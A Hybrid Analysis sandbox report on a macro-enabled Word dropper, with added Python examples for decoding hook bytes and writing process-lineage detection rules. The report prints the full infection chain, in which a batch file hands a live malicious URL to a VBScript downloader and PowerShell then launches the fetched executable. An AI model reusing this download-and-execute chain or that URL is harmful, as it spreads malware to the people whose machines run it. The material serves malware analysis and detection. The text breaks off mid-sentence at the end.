30ecfa4d51114c6b273d6de314ce9f56
This report was generated from a file or URL submitted to this web service on March 11th 2020 22:28:32 (UTC), using the action script "Heavy Anti-Evasion".
Guest System: Windows 7 32 bit, Professional, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Persistence: Spawns a lot of processes
- Network Behavior: Contacts 23 domains and 2 hosts
Indicators
Not all malicious and suspicious indicators are displayed.

Malicious Indicators (9)

External Systems

Sample was identified as malicious by a trusted Antivirus engine
- details: No specific details available
- source: External System
- relevance: 5/10

Sample was identified as malicious by at least one Antivirus engine
- details: 7/62 Antivirus vendors marked sample as malicious (11% detection rate)
- source: External System
- relevance: 8/10

General

Document spawns new processes
- details: Document spawned a new process (macro present)
- source: Indicator Combinations
- relevance: 7/10

GETs files from a webserver
- details:
  GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: secure.zenithglobalplc.com
- source: Network Traffic
- relevance: 10/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details: Found malicious artifacts related to "198.54.126.167": ...
- source: Network Traffic
- relevance: 10/10

Multiple malicious artifacts seen in the context of different hosts
- details: Found malicious artifacts related to "198.54.126.167": ...
- source: Network Traffic
- relevance: 10/10

Unusual Characteristics

Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details: Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
- source: Static Parser
- relevance: 10/10
- ATT&CK ID: T1137

Spawns a lot of processes
- details:
  Spawned process "WINWORD.EXE" with commandline "/n "C:\30ecfa4d51114c6b273d6de314ce9f56.doc""
  Spawned process "cmd.exe" with commandline "/c C:\MyImages\presskey.cmd"
  Spawned process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe"
  Spawned process "powershell.exe" with commandline "powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe'"
  Spawned process "TRACERT.EXE" with commandline "TRACERT chiark.greenend.org.uk"
  Spawned process "NETSTAT.EXE"
  Spawned process "fc.exe" with commandline "fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs"
- source: Monitored Target
- relevance: 8/10

Hiding 1 Malicious Indicator
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators (11)

External Systems

Detected Suricata Alert
- details: Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details:
  2/71 reputation engines marked "http://secure.zenithglobalplc.com" as malicious (2% detection rate)
  4/71 reputation engines marked "https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe" as malicious (5% detection rate)
  2/71 reputation engines marked "http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe" as malicious (2% detection rate)
- source: External System
- relevance: 10/10

General

Found a potential E-Mail address in binary/memory
- details:
  Pattern match: "zx2jmf@3lkq.v"
  Pattern match: "2d@k2.jcb"
  Pattern match: "r@yj.z_e"
  Pattern match: "x@u5.mw6fg"
- source: File/Memory
- relevance: 3/10
- ATT&CK ID: T1114

Installation/Persistence

Executes a visual basic script
- details: Process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe"
- source: Monitored Target
- relevance: 10/10

Network Related

Found potential IP address in binary/memory
- details: heuristic matches on reverse-DNS (in-addr.arpa) names
- source: File/Memory
- relevance: 3/10

Sends traffic on typical HTTP outbound port, but without HTTP header
- details:
  TCP traffic to 198.54.126.167 on port 80 is sent without HTTP header
  TCP traffic to 198.54.126.167 on port 443 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10

Uses a User Agent typical for browsers, although no browser was ever launched
- details: Found user agent(s): Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- source: Network Traffic
- relevance: 10/10

System Security

References security related windows services
- details: "mpssvc" (Indicator: "mpssvc")
- source: File/Memory
- relevance: 7/10
- ATT&CK ID: T1044

Unusual Characteristics

Contains embedded VBA macros with interesting strings
- details:
  Found pattern type "Executable file name" with value: "presskey.cmd"
  Found pattern type "Executable file name" with value: "presskey.jse"
  Found pattern type "Executable file name" with value: "presskey2.cmd"
- source: Static Parser
- relevance: 10/10

Contains embedded VBA macros with suspicious keywords
- details:
  Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
  Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "SW_HIDE" which indicates: "May hide the application"
  Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "Put" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
  Found suspicious keyword "Binary" which indicates: "May read or write a binary file (if combined with Open)"
  Found suspicious keyword "Kill" which indicates: "May delete a file"
- source: Static Parser
- relevance: 10/10

Hiding 1 Suspicious Indicator
- All indicators are available only in the private webservice or standalone version

Informative (25)

Environment Awareness

Queries the installation properties of user installed products
- details: "WINWORD.EXE" read the INSTALLPROPERTIES subkeys under "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS" (one per product code)
- source: Registry Access
- relevance: 10/10

Reads the registry for installed applications
- details: "WINWORD.EXE" read the APP PATHS and UNINSTALL keys under HKCU and HKLM "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION"
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1012

General

Contacts domains
- details:
  "secure.zenithglobalplc.com" (the remaining entries are reverse-DNS in-addr.arpa and ip6.arpa names)
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
  "198.54.126.167:80"
  "198.54.126.167:443"
- source: Network Traffic
- relevance: 1/10

Contains embedded VBA macros
- details: details too long to display
- source: Static Parser
- relevance: 10/10

Creates mutants
- details: Explorer thumbnail-cache, shell and Office mutexes under "\Sessions\1\BaseNamedObjects"
- source: Created Mutant
- relevance: 3/10

Drops files marked as clean
- details:
  Antivirus vendors marked dropped file "~_ecfa4d51114c6b273d6de314ce9f56.doc" as clean (type is "data")
  Antivirus vendors marked dropped file "~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx" as clean (type is "data")
- source: Binary File
- relevance: 10/10

Launches a VBS file
- details: Process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe"
- source: Monitored Target
- relevance: 10/10

Loads rich edit control libraries
- details: "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B2E0000
- source: Loaded Module
- ATT&CK ID: T1179

Loads the .NET runtime environment
- details: "powershell.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_32\mscorlib\9f895c66454577eff9c77442d0c84f71\mscorlib.ni.dll" at 5E150000
- source: Loaded Module

Opened the service control manager
- details:
  "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_CONNECT" (0x1)
  "WINWORD.EXE" called "OpenSCManager" requesting access rights "0X0"
  "WINWORD.EXE" called "OpenSCManager" requesting access rights "0X5"
  "WINWORD.EXE" called "OpenSCManager" requesting access rights "SC_MANAGER_ENUMERATE_SERVICE" (0x4)
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1035

Overview of unique CLSIDs touched in registry
- details: shell, property-system and Office CLSID keys touched by "WINWORD.EXE" under "HKCU\CLSID"
- source: Registry Access
- relevance: 3/10

Process launched with changed environment
- details:
  Process "cmd.exe" was launched with new environment variables: "WecVersionForRosebud.B14="4""
  Process "cscript.exe" was launched with new environment variables: "PathToVbs="C:\MyImages\tlofgkkjl15g5k.vbs""
- source: Monitored Target
- relevance: 10/10

Removes Office resiliency keys (often used to avoid problems opening documents)
- details:
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "~ ;")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "'/;")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\3A6BE0"; Key: "3A6BE0")
  "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\DOCUMENTRECOVERY\3A6BE0")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "L8;")
  "WINWORD.EXE" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS"; Key: "<~:")
  "WINWORD.EXE" (Access type: "DELETE"; Path: "HKCU\SOFTWARE\MICROSOFT\OFFICE\14.0\WORD\RESILIENCY\STARTUPITEMS")
- source: Registry Access
- relevance: 10/10
- ATT&CK ID: T1112

Runs shell commands
- details: "/c C:\MyImages\presskey.cmd" on 2020-3-11.23:29:55.326
- source: Monitored Target
- relevance: 5/10

Scanning for window names
- details:
  "WINWORD.EXE" searching for class "mspim_wnd32"
  "WINWORD.EXE" searching for class "MSOBALLOON"
  "WINWORD.EXE" searching for class "MsoHelp10"
  "WINWORD.EXE" searching for class "AgentAnim"
- source: API Call
- relevance: 10/10
- ATT&CK ID: T1010

Spawns new processes
- details:
  Spawned process "cmd.exe" with commandline "/c C:\MyImages\presskey.cmd"
  Spawned process "cscript.exe" with commandline "cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.z ..."
  Spawned process "powershell.exe" with commandline "powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe'"
  Spawned process "TRACERT.EXE" with commandline "TRACERT chiark.greenend.org.uk"
  Spawned process "NETSTAT.EXE"
  Spawned process "fc.exe" with commandline "fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs"
- source: Monitored Target
- relevance: 3/10

Installation/Persistence

Creates new processes
- details:
  "WINWORD.EXE" is creating a new process
  "WINWORD.EXE" is creating a new process (Name: "%WINDIR%\System32\cmd.exe", Handle: 1440)
  "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\cscript.exe", Handle: 88)
  "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe", Handle: 92)
  "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\TRACERT.EXE", Handle: 88)
  "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\NETSTAT.EXE", Handle: 92)
  "cmd.exe" is creating a new process (Name: "%WINDIR%\System32\fc.exe", Handle: 88)
- source: API Call
- relevance: 8/10

Dropped files
- details:
  "Copy_of_30ecfa4d51114c6b273d6de314ce9f56.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Mar 11 22:33:00 2020 mtime=Wed Mar 11 22:33:00 2020 atime=Wed Mar 11 22:33:00 2020 length=95764 window=hide"
  "presskey.cmd" has type "ASCII text with CRLF line terminators"
  "tlofgkkjl15g5k.vbs" has type "ASCII text with CRLF line terminators"
  "30ecfa4d51114c6b273d6de314ce9f56.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Archive ctime=Wed Mar 11 22:29:28 2020 mtime=Wed Mar 11 22:29:28 2020 atime=Wed Mar 11 22:29:36 2020 length=427476 window=hide"
  "~_ecfa4d51114c6b273d6de314ce9f56.doc" has type "data"
  "presskey.jse" has type "ASCII text with CRLF line terminators"
  "~_py_of_30ecfa4d51114c6b273d6de314ce9f56.docx" has type "data"
  "My Pictures.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Read-Only Directory ctime=Sun Dec 3 11:06:16 2017 mtime=Wed Mar 11 23:10:00 2020 atime=Wed Mar 11 23:10:00 2020 length=0 window=hide"
  "presskey2.cmd" has type "ASCII text with CRLF line terminators"
  "My Documents.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Read-Only Directory ctime=Sun Dec 3 11:06:16 2017 mtime=Wed Mar 11 22:33:00 2020 atime=Wed Mar 11 22:33:00 2020 length=4096 window=hide"
  "urlref_httpsecure.zenithglobalplc.comassetspluginsbootstrap-wizardsystem_x64.exe" has type "HTML document ASCII text"
  "index.dat" has type "data"
  "~WRS_3A453929-2FEF-4064-B533-8FC8672F0C80_.tmp" has type "data"
  "F9WBNAXRJHNLDD2T43FV.temp" has type "data"
  "D6FFDBE7.jpeg" has type "JPEG image data JFIF standard 1.01 resolution (DPI) density 96x96 segment length 16 Exif Standard: [TIFF image data big-endian direntries=6 orientation=upper-left] baseline precision 8 789x559 frames 3"
  "~WRD0000.tmp" has type "Microsoft Word 2007+"
  "~WRS_62DEE603-9E85-4752-BC6A-2A98D0CC80A7_.tmp" has type "data"
  "presskey.jse5" has type "ASCII text with CRLF line terminators"
  "presskey.jse4" has type "ASCII text with CRLF line terminators"
  "MSForms.exd" has type "data"
- source: Binary File
- relevance: 3/10

Touches files in the Windows directory
- details: "WINWORD.EXE" touched .NET Framework, System32 and font files under "C:\Windows", plus temporary files under "Temporary Internet Files\Content.Word"
- source: API Call
- relevance: 7/10

Network Related

Found potential URL in binary/memory
- details:
  Heuristic match: "secure.zenithglobalplc.com"
  Heuristic match: "GET /assets/plugins/bootstrap-wizard/system_x64.exe HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  Host: secure.zenithglobalplc.com"
  Pattern match: "https://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe"
  Pattern match: "http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe"
  Heuristic match: "TRACERT chiark.greenend.org.uk"
  (further heuristic matches are reverse-DNS in-addr.arpa and ip6.arpa names)
Pattern match: "d9.QK/tjE7&97vI0VVVK~g'R?hMMR=0Yo^~_$Rw%~"
Pattern match: "j.gZ/%f"
Pattern match: "u.JUU/5qZca6QDg7`7Ws=%"
Heuristic match: "TRACERT chiark.greenend.org.uk" - source
- File/Memory
- relevance
- 10/10
-
System Security
-
Creates or modifies windows services
- details
-
"cscript.exe" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"TRACERT.EXE" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS")
"NETSTAT.EXE" (Access type: "CREATE"; Path: "HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS") - source
- Registry Access
- relevance
- 10/10
- ATT&CK ID
- T1112
-
Hooks API calls
- details
-
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
-
Unusual Characteristics
-
Drops a text file that contains suspicious strings (e.g. shell/ActiveX/DOM related)
- details
-
"presskey.cmd" contains indicator "WinHTTP" (Line: 25; Offset: 33)
"tlofgkkjl15g5k.vbs" contains indicator "WinHTTP" (Line: 23; Offset: 28) - source
- Binary File
- relevance
- 8/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x751783DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b88011206dffe0" to virtual address "0x755E1368" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "e9fef37dee" to virtual address "0x75A3A00A" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "c04e3d7720543e77e0653e77b5383f770000000000d0fd7500000000c5eafd750000000088eafd7500000000e968477582283f77ee293f7700000000d2694775000000007dbbfd750000000009be477500000000ba18fd7500000000" to virtual address "0x76291000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "a011206d" to virtual address "0x7595E324" (part of module "WININET.DLL")
"WINWORD.EXE" wrote bytes "e9c454bced" to virtual address "0x760B3F20" ("VariantClear@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "7f7ce082" to virtual address "0x6B329904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "944ff382" to virtual address "0x63E90BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "f8111675" to virtual address "0x751783C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8111675" to virtual address "0x7517834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x751783C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x75178348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "c1a7dd82" to virtual address "0x64E978E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x75161408" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "9330f085" to virtual address "0x2F6A1B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "d5d9fd7530c6fd75e0c2fd7542c6fd7510c6fd75acdcfd75a0dffd7536dafd7587f1fd750000000091774f77c0904f777f6f4f771ffa4f77def44f77f2824f77857d4f7700000000" to virtual address "0x6D491000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "e9d732bced" to virtual address "0x760B47BA" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x751612DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e96953bbed" to virtual address "0x760B3F8A" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9ab99beed" to virtual address "0x760B5D66" ("VariantChangeType@OLEAUT32.DLL") - source
- Hook Detection
- relevance
- 10/10
- ATT&CK ID
- T1179
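The hook records above are raw byte writes, so reading them means decoding the bytes as x86 and working out where each patch transfers control. The Python below is an added example, not part of the Falcon Sandbox report, that parses four of the lines above (copied verbatim) and classifies each write as a 5-byte E9 JMP rel32 (destination = address + 5 + signed displacement), a 7-byte "mov eax, imm32 ; jmp eax" trampoline, or a plain 4-byte little-endian pointer. The report gives no module bounds for the computed destinations, so the example prints them without attributing them to a module.

```python
"""Decode the "wrote bytes ... to virtual address" records from the hook-detection list."""
import re
import struct

# Four records copied from the hook-detection lines above.
REPORT_LINES = [
    '"WINWORD.EXE" wrote bytes "e9fef37dee" to virtual address "0x75A3A00A" ("OleLoadFromStream@OLE32.DLL")',
    '"WINWORD.EXE" wrote bytes "b88011206dffe0" to virtual address "0x755E1368" (part of module "WS2_32.DLL")',
    '"WINWORD.EXE" wrote bytes "48121675" to virtual address "0x751783DC" (part of module "SSPICLI.DLL")',
    '"WINWORD.EXE" wrote bytes "e9c454bced" to virtual address "0x760B3F20" ("VariantClear@OLEAUT32.DLL")',
]

LINE_RE = re.compile(
    r'wrote bytes "([0-9a-fA-F]+)" to virtual address "0x([0-9a-fA-F]+)" '
    r'\((?:part of module )?"([^"]+)"\)'
)


def parse_record(line):
    """Return (patch bytes, write address, module or export name) for one report line."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("unrecognised record: " + line)
    return bytes.fromhex(m.group(1)), int(m.group(2), 16), m.group(3)


def classify_write(data, addr):
    """Classify a patch and, where it is a control transfer, compute its destination.

    jmp_rel32    E9 <rel32>        5 bytes; destination = addr + 5 + signed rel32 (mod 2**32)
    mov_eax_jmp  B8 <imm32> FF E0  7 bytes; 'mov eax, imm32 ; jmp eax', destination = imm32
    pointer      4 bytes           a little-endian 32-bit value written into a pointer slot
    data         anything else     pointer tables or code this decoder does not model
    """
    if len(data) == 5 and data[0] == 0xE9:
        rel32 = struct.unpack("<i", data[1:5])[0]          # signed displacement
        return "jmp_rel32", (addr + 5 + rel32) & 0xFFFFFFFF
    if len(data) == 7 and data[0] == 0xB8 and data[5:7] == b"\xff\xe0":
        return "mov_eax_jmp", struct.unpack("<I", data[1:5])[0]
    if len(data) == 4:
        return "pointer", struct.unpack("<I", data)[0]
    return "data", None


def decode_all(lines):
    """Decode every record: where it was written, what kind of patch, and the destination."""
    results = []
    for line in lines:
        data, addr, where = parse_record(line)
        kind, target = classify_write(data, addr)
        results.append({"where": where, "addr": addr, "kind": kind, "target": target})
    return results


if __name__ == "__main__":
    for r in decode_all(REPORT_LINES):
        dest = "-" if r["target"] is None else f"0x{r['target']:08X}"
        print(f"{r['where']:<32} @0x{r['addr']:08X}  {r['kind']:<12} -> {dest}")
```

The four E9 patches on the OLEAUT32 and OLE32 exports all resolve to destinations in the 0x63C7xxxx to 0x6421xxxx range, well below the patched images; the report lists writes into MSO.DLL near 0x63E90BA8 but not its bounds, so naming the owning module needs the loaded-module list from the full report rather than this decoder.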
File Details
30ecfa4d51114c6b273d6de314ce9f56
- Filename
- 30ecfa4d51114c6b273d6de314ce9f56
- Size
- 417KiB (427476 bytes)
- Type
- docx office
- Description
- Microsoft Word 2007+
- Architecture
- WINDOWS
- SHA256
- 5c4f89b78a4a4385a59e37e8f27addd76ba92ef6bea004efe8df0cc3b64e0cd2
- MD5
- 30ecfa4d51114c6b273d6de314ce9f56
- SHA1
- cc3de1f22e990fd00afb4476d48ed98e7bcd9803
- ssdeep
- 12288:4BbHTOsVda4OVI9KszGGntQWf/27hG+WJ:kbHTzd9KEYWf/27hG+WJ
Classification (TrID)
- 53.0% (.DOCM) Word Microsoft Office Open XML Format document (with Macro)
- 23.9% (.DOCX) Word Microsoft Office Open XML Format document
- 17.8% (.ZIP) Open Packaging Conventions container
- 4.0% (.ZIP) ZIP compressed archive
- 1.0% (.BIN) PrintFox/Pagefox bitmap (var. P)
Hybrid Analysis
Analysed 7 processes in total.
- WINWORD.EXE /n "C:\30ecfa4d51114c6b273d6de314ce9f56.doc" (PID: 2836)
- cmd.exe /c C:\MyImages\presskey.cmd (PID: 3652)
- cscript.exe cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe C:\MyImages\Louu6hbte.exe (PID: 3720)
- powershell.exe powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe' (PID: 3272)
- TRACERT.EXE TRACERT chiark.greenend.org.uk (PID: 2504)
- NETSTAT.EXE (PID: 2704)
- fc.exe fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs (PID: 2796)
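The process list above is the whole chain: the document runs a batch file, the batch file hands a URL and a destination path to a VBScript downloader, and PowerShell launches the result through the Saps (Start-Process) alias after a short sleep, with tracert and netstat run alongside. The Python below is an added example, not report output, showing the lineage and command-line rules a detection engineer would apply to such records. The events are constructed from the PIDs and command lines shown above; the parent links are an assumption, because the extracted text loses the tree indentation and the report only confirms that the document spawned processes. One caveat on the earlier "Creates or modifies windows services" indicator: it records tracert and netstat opening HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, a key those network utilities open as a matter of course; the signal is that they run under an Office document, not the key access.

```python
"""Lineage and command-line rules over sandbox process records."""
import re

# Constructed from the PIDs and command lines in the process list above.
# ppid values are an ASSUMPTION (the extracted report loses tree indentation):
# the document is taken as the root and cmd.exe as the parent of the rest.
EVENTS = [
    {"pid": 2836, "ppid": 0, "image": "WINWORD.EXE",
     "cmd": r'/n "C:\30ecfa4d51114c6b273d6de314ce9f56.doc"'},
    {"pid": 3652, "ppid": 2836, "image": "cmd.exe",
     "cmd": r"/c C:\MyImages\presskey.cmd"},
    {"pid": 3720, "ppid": 3652, "image": "cscript.exe",
     "cmd": r"cscript //nologo C:\MyImages\tlofgkkjl15g5k.vbs "
            r"http://secure.zenithglobalplc.com/assets/plugins/bootstrap-wizard/system_x64.exe "
            r"C:\MyImages\Louu6hbte.exe"},
    {"pid": 3272, "ppid": 3652, "image": "powershell.exe",
     "cmd": r"powershell -C Sleep -s 3;Saps 'C:\MyImages\Louu6hbte.exe'"},
    {"pid": 2504, "ppid": 3652, "image": "TRACERT.EXE", "cmd": "TRACERT chiark.greenend.org.uk"},
    {"pid": 2704, "ppid": 3652, "image": "NETSTAT.EXE", "cmd": ""},
    {"pid": 2796, "ppid": 3652, "image": "fc.exe",
     "cmd": r"fc C:\MyImages\Louu6hbte.exe C:\MyImages\tlofgkkjl15g5k.vbs"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe"}
DISCOVERY = {"tracert.exe", "netstat.exe", "ipconfig.exe", "nslookup.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"]+")


def ancestors(events, pid):
    """Image names of the process's parents, nearest first."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    pid = by_pid[pid]["ppid"]
    while pid in by_pid:
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def evaluate(events):
    """Return (hits, iocs): rule hits as (pid, rule) plus URLs and paths pulled from command lines."""
    hits = []
    iocs = {"urls": set(), "paths": set()}
    for e in events:
        img, cmd = e["image"].lower(), e["cmd"]
        under_office = bool(OFFICE & set(ancestors(events, e["pid"])))
        # Rule 1: command or script interpreter anywhere below an Office process.
        if img in INTERPRETERS and under_office:
            hits.append((e["pid"], "office_spawns_interpreter"))
        # Rule 2: script host handed a URL and a local executable path (downloader pattern).
        if img in {"cscript.exe", "wscript.exe"} and URL_RE.search(cmd) and re.search(r"\.exe\b", cmd, re.I):
            hits.append((e["pid"], "script_host_downloader"))
        # Rule 3: PowerShell launching a file via Start-Process or its 'saps' alias.
        if img == "powershell.exe" and re.search(r"\b(start-process|saps)\b", cmd, re.I):
            hits.append((e["pid"], "powershell_start_process"))
        # Rule 4: network discovery tool running below an Office process.
        if img in DISCOVERY and under_office:
            hits.append((e["pid"], "office_tree_network_discovery"))
        iocs["urls"].update(URL_RE.findall(cmd))
        iocs["paths"].update(PATH_RE.findall(cmd))
    return hits, iocs


if __name__ == "__main__":
    hits, iocs = evaluate(EVENTS)
    for pid, rule in hits:
        print(f"PID {pid}: {rule}")
    for url in sorted(iocs["urls"]):
        print("URL:", url)
    for path in sorted(iocs["paths"]):
        print("Path:", path)
```

Rule 2 is the one that yields actionable IOCs here: the download URL and the drop path both travel on the cscript.exe command line, so a process-creation log alone recovers them without the HTTP capture.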
Network Analysis
DNS Requests
Domain | Address | Registrar | Country |
---|---|---|---|
112.240.168.192.in-addr.arpa | - | - | - |
113.240.168.192.in-addr.arpa | - | - | - |
161.12.124.64.in-addr.arpa | - | - | - |
18.29.125.64.in-addr.arpa | - | - | - |
183.85.36.23.in-addr.arpa | - | - | - |
2.240.168.192.in-addr.arpa | - | - | - |
21.25.125.64.in-addr.arpa | - | - | - |
218.31.125.64.in-addr.arpa | - | - | - |
229.197.13.212.in-addr.arpa | - | - | - |
230.30.125.64.in-addr.arpa | - | - | - |
231.240.168.192.in-addr.arpa | - | - | - |
232.240.168.192.in-addr.arpa | - | - | - |
237.30.125.64.in-addr.arpa | - | - | - |
239.169.153.194.in-addr.arpa | - | - | - |
34.224.66.195.in-addr.arpa | - | - | - |
5.2.5.d.b.b.2.d.9.1.4.1.7.8.d.a.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
53.30.125.64.in-addr.arpa | - | - | - |
70.169.153.194.in-addr.arpa | - | - | - |
79.169.153.194.in-addr.arpa | - | - | - |
b.4.e.5.2.5.d.4.b.3.0.6.4.7.1.e.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
chiark.greenend.org.uk | 212.13.197.229 (TTL: 299) | - | United Kingdom |
f.6.d.7.1.b.a.3.5.c.e.9.0.a.1.6.0.0.0.0.0.0.0.0.0.0.0.0.0.8.e.f.ip6.arpa | - | - | - |
secure.zenithglobalplc.com | 198.54.126.167 (TTL: 1199) | - | United States |
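Most of the names in the DNS table are reverse-lookup (PTR) queries, which is what tracert issues for every hop on its way to chiark.greenend.org.uk; the same names also account for most of the "Found potential URL in binary/memory" matches earlier. The Python below is an added example, not part of the report, that turns in-addr.arpa and ip6.arpa names back into addresses and separates sandbox-internal space (RFC 1918, link-local, loopback) from external hops, using four of the names above.

```python
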